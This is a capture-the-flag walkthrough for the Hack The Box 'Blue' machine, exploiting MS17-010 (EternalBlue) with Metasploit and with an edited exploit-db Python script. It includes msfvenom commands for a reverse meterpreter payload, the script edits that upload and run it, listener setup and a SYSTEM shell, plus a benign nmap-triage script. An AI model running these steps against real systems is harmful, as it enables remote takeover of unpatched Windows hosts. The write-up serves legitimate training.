Blue is a very simple box that is vulnerable to MS17-010 (EternalBlue). I will show how to exploit it using Metasploit, and then a second way by generating our own payload with msfvenom combined with a Python script.
Using Metasploit
Start with an nmap scan
# Nmap 7.80 scan initiated Mon Oct 21 23:09:48 2019 as: nmap -sV -sC -T4 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.059s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -4h18m55s, deviation: 34m36s, median: -3h58m56s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-10-22T00:11:58+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-10-21T23:11:59
|_ start_date: 2019-10-21T09:24:16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 21 23:11:00 2019 -- 1 IP address (1 host up) scanned in 72.43 seconds
So a few ports are open; most of them are of no use to us, but SMB (445/tcp) is. We can verify that the host is vulnerable to EternalBlue by using nmap's vuln scripts.
# nmap --script vuln -p 445 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 00:26 EDT
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
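As an added, defender-side example (not part of the original writeup), here is a small Python triage script that reads the XML nmap writes with -oX from the same --script vuln scan run across a range, and lists the hosts that still report MS17-010 as VULNERABLE, putting those whose SMB signing is not required first. The sample XML is constructed inline and its element layout is an assumption modelled on nmap's XML output; the values are the ones from the scan above.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output for three hosts. The hostscript layout
# (script/table/elem with "state" and "message_signing" keys) is an assumption
# modelled on nmap's XML format; the values are the ones from the scan above.
SAMPLE_XML = """<nmaprun>
 <host><address addr="10.10.10.40" addrtype="ipv4"/>
  <hostscript>
   <script id="smb-vuln-ms17-010" output="VULNERABLE">
    <table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem>
     <elem key="risk_factor">HIGH</elem></table></script>
   <script id="smb-security-mode" output="guest">
    <elem key="account_used">guest</elem>
    <elem key="message_signing">disabled</elem></script>
  </hostscript></host>
 <host><address addr="10.10.10.41" addrtype="ipv4"/>
  <hostscript>
   <script id="smb-vuln-ms17-010" output="not vulnerable"/>
   <script id="smb-security-mode" output="signing">
    <elem key="message_signing">required</elem></script>
  </hostscript></host>
 <host><address addr="10.10.10.42" addrtype="ipv4"/></host>
</nmaprun>"""

def triage_hosts(xml_text):
    """Map each IPv4 host to its MS17-010 state, SMB signing mode and guest access."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        info = {"ms17_010": False, "signing": "unknown", "guest": False}
        for script in host.iter("script"):
            if script.get("id") == "smb-vuln-ms17-010":
                # the vulns library emits one table per CVE, each with a 'state' elem
                states = [e.text for e in script.iter("elem") if e.get("key") == "state"]
                info["ms17_010"] = "VULNERABLE" in states
            elif script.get("id") == "smb-security-mode":
                for e in script.iter("elem"):
                    if e.get("key") == "message_signing":
                        info["signing"] = e.text
                    elif e.get("key") == "account_used":
                        info["guest"] = e.text == "guest"
        findings[addr.get("addr")] = info
    return findings

def patch_list(findings):
    """Hosts needing the MS17-010 patch (or SMBv1 disabled); unsigned SMB first."""
    vuln = [ip for ip, f in findings.items() if f["ms17_010"]]
    return sorted(vuln, key=lambda ip: findings[ip]["signing"] == "required")
```

Hosts with no hostscript block (445 filtered or closed) end up with signing "unknown" and are not listed for patching, so they still deserve a manual look.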
Now if we start Metasploit and load the exploit, we can enter show options and see that the only value we really have to set is RHOSTS.
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
I set RHOSTS to the IP of the box, then hit exploit and am given a shell. Running whoami shows that I am NT AUTHORITY\SYSTEM.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.39:4444
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.39:4444 -> 10.10.10.40:49160) at 2019-10-22 00:34:30 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>whoami
whoami
nt authority\system
Manual Walkthrough
Using searchsploit we can find the Python script that we will be using. We want the second one.
# searchsploit "Eternal Blue"
--------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Ex | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remo | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------- ----------------------------------------
You can copy it to your current working directory with the -m option.
# searchsploit -m exploits/windows/remote/42315.py
Now there are a couple of steps we have to take before we can actually run the exploit. First we have to generate our payload.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.39 LPORT=9999 -f exe > blue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Next we need to edit the Python script. First edit the USERNAME variable so that it contains two slashes (//). This works because the SMB server allows guest login.
USERNAME = '//'
PASSWORD = ''
Lastly, uncomment two lines in smb_pwn and edit them to point to the payload that you created.
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    # the two lines below were commented out in the original script: uncomment
    # them and point them at the payload generated with msfvenom
    smb_send_file(smbConn, '/root/Documents/HTB2/Blue/blue.exe', 'C', '/blue.exe')
    service_exec(conn, r'cmd /c c:\\blue.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
Now we need to set up our listener. For this we will use Metasploit's multi/handler. Set LHOST and LPORT to your IP and the port you chose when generating the payload, then set the payload to the same Windows reverse shell you gave msfvenom. Type exploit to start the handler.
msf5 exploit(multi/handler) > set lhost 10.10.14.39
lhost => 10.10.14.39
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.39:9999
Now let's execute the Python script.
# python eternalBlue.py 10.10.10.40 ntsvcs
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
No transaction struct in leak data
leak failed... try again
No transaction struct in leak data
leak failed... try again
CONNECTION: 0xfffffa800405f020
SESSION: 0xfffff8a008df08e0
FLINK: 0xfffff8a000915048
InParam: 0xfffff8a00284b15c
MID: 0x4603
unexpected alignment, diff: 0x-1f36fb8
leak failed... try again
CONNECTION: 0xfffffa800405f020
SESSION: 0xfffff8a008df08e0
FLINK: 0xfffff8a0026dd048
InParam: 0xfffff8a00285715c
MID: 0x4607
unexpected alignment, diff: 0x-17afb8
leak failed... try again
CONNECTION: 0xfffffa800405f020
SESSION: 0xfffff8a008df08e0
FLINK: 0xfffff8a002883088
InParam: 0xfffff8a00287d15c
MID: 0x4703
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service OuBS.....
Starting service OuBS.....
The NETBIOS connection with the remote host timed out.
Removing service OuBS.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
If we go back to the reverse handler we see that a meterpreter session has opened.
[*] Sending stage (180291 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.39:9999 -> 10.10.10.40:49161) at 2019-10-22 01:01:24 -0400
meterpreter >
From here we can use the shell command to get a Windows shell. Running whoami shows that we are indeed NT AUTHORITY\SYSTEM. From here we can grab both the user and root flags.
The user.txt flag is located in C:\Users\haris\Desktop\user.txt.
C:\Users\haris\Desktop>type user.txt
type user.txt
4c546aea7dbee75c****************
The root.txt flag is located in C:\Users\Administrator\Desktop\root.txt.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6****************